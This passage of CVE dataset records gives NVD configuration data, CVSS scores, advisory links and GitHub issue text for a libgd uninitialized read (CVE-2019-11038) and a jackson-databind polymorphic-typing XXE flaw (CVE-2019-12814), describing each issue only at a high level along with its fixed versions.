"C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "matchCriteriaId": "D100F7CE-FC64-4CC6-852A-6136D72DA419", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp4:*:*:*:*:*:*", "matchCriteriaId": "F892F1B0-514C-42F7-90AE-12ACDFDC1033", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp4:*:*:*:*:*:*", "matchCriteriaId": "55242557-663C-4870-A439-4C8FEEB69E7F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_server:12:sp4:*:*:*:*:*:*", "matchCriteriaId": "55E8AB88-2347-497B-91DE-AF64E08ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_server:12:sp5:*:*:*:*:*:*", "matchCriteriaId": "29AE5751-3EA5-4056-8E79-16D8DCD248EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp4:*:*:*:*:*:*", "matchCriteriaId": "227AB4E0-7CD4-4094-BAA4-E98DC5279C97", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp5:*:*:*:*:*:*", "matchCriteriaId": "6C734CEC-64F2-4129-B52E-C81884B3AC9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp4:*:*:*:*:*:*", "matchCriteriaId": "282B31FD-C5BB-4D81-9F74-6670B42551D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp5:*:*:*:*:*:*", "matchCriteriaId": "243B9B56-C744-4C1C-B42E-158C1B041B6A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:software_collections:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9D7EE4B6-A6EC-4B9B-91DF-79615796673F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "908" ]
908
https://github.com/libgd/libgd/issues/501
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libgd", "libgd" ]
There is a GD related issue fixed in PHP (7.1.30, 7.2.19 and 7.3.6) which was assigned CVE-2019-11038 and is in the PHP bug https://bugs.php.net/bug.php?id=77973 . Filling the issue for the correlated issue in the libgd library itself.
Uninitialized read in gdImageCreateFromXbm (CVE-2019-11038)
https://api.github.com/repos/libgd/libgd/issues/501/comments
3
2019-05-31T20:28:02Z
2019-09-02T08:30:00Z
https://github.com/libgd/libgd/issues/501
450,968,797
501
427
CVE-2019-12814
2019-06-19T14:15:10.897
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3046" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2341" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/129da0204c876f746636018751a086cc581e0e07bcdeb3ee22ff5731%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/15a55e1d837fa686db493137cc0330c7ee1089ed9a9eea7ae7151ef1%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/1e04d9381c801b31ab28dec813c31c304b2a596b2a3707fa5462c5c0%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/28be28ffd6471d230943a255c36fe196a54ef5afc494a4781d16e37c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/2ff264b6a94c5363a35c4c88fa93216f60ec54d1d973ed6b76a9f560%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/4b832d1327703d6b287a6d223307f8f884d798821209a10647e93324%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/71f9ffd92410a889e27b95a219eaa843fd820f8550898633d85d4ea3%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/8fe2983f6d9fee0aa737e4bd24483f8f5cf9b938b9adad0c4e79b2a4%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef%40%3Cdev.struts.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/a3ae8a8c5e32c413cd27071d3a204166050bf79ce7f1299f6866338f%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/a62aa2706105d68f1c02023fe24aaa3c13b4d8a1826181fed07d9682%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/a78239b1f11cddfa86e4edee19064c40b6272214630bfef070c37957%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/b0a2b2cca072650dbd5882719976c3d353972c44f6736ddf0ba95209%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/b148fa2e9ef468c4de00de255dd728b74e2a97d935f8ced31eb41ba2%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/bf20574dbc2db255f1fd489942b5720f675e32a2c4f44eb6a36060cd%40%3Ccommits.accumulo.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/e0733058c0366b703e6757d8d2a7a04b943581f659e9c271f0841dfe%40%3Cnotifications.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/eff7280055fc717ea8129cd28a9dd57b8446d00b36260c1caee10b87%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20190625-0006/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3046" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2341" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/129da0204c876f746636018751a086cc581e0e07bcdeb3ee22ff5731%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/15a55e1d837fa686db493137cc0330c7ee1089ed9a9eea7ae7151ef1%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/1e04d9381c801b31ab28dec813c31c304b2a596b2a3707fa5462c5c0%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/28be28ffd6471d230943a255c36fe196a54ef5afc494a4781d16e37c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/2ff264b6a94c5363a35c4c88fa93216f60ec54d1d973ed6b76a9f560%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/4b832d1327703d6b287a6d223307f8f884d798821209a10647e93324%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/71f9ffd92410a889e27b95a219eaa843fd820f8550898633d85d4ea3%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/8fe2983f6d9fee0aa737e4bd24483f8f5cf9b938b9adad0c4e79b2a4%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef%40%3Cdev.struts.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/a3ae8a8c5e32c413cd27071d3a204166050bf79ce7f1299f6866338f%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/a62aa2706105d68f1c02023fe24aaa3c13b4d8a1826181fed07d9682%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/a78239b1f11cddfa86e4edee19064c40b6272214630bfef070c37957%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/b0a2b2cca072650dbd5882719976c3d353972c44f6736ddf0ba95209%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/b148fa2e9ef468c4de00de255dd728b74e2a97d935f8ced31eb41ba2%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/bf20574dbc2db255f1fd489942b5720f675e32a2c4f44eb6a36060cd%40%3Ccommits.accumulo.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/e0733058c0366b703e6757d8d2a7a04b943581f659e9c271f0841dfe%40%3Cnotifications.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be%40%3Cdev.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/eff7280055fc717ea8129cd28a9dd57b8446d00b36260c1caee10b87%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20190625-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD", "versionEndExcluding": "2.6.7.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "89660FC3-9198-414C-B89D-C61A4438BA3B", "versionEndExcluding": "2.7.9.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "5DB8A2D4-0FDE-4216-896B-52824106B97B", "versionEndExcluding": "2.8.11.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "04641592-DAF4-47BB-A9DE-FC4C84A20401", "versionEndExcluding": "2.9.9.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2341
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Similar to other polymorphic types with no limits, but for XXE with `jdom2.jar`, tracked as `CVE-2019-12814`. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Fixed in: * 2.9.10 * 2.8.11.4 * 2.7.9.6 * 2.6.7.3
Block yet another gadget type (jdom, CVE-2019-12814)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2341/comments
35
2019-06-04T04:08:07Z
2019-10-16T04:53:30Z
https://github.com/FasterXML/jackson-databind/issues/2341
451,788,559
2,341
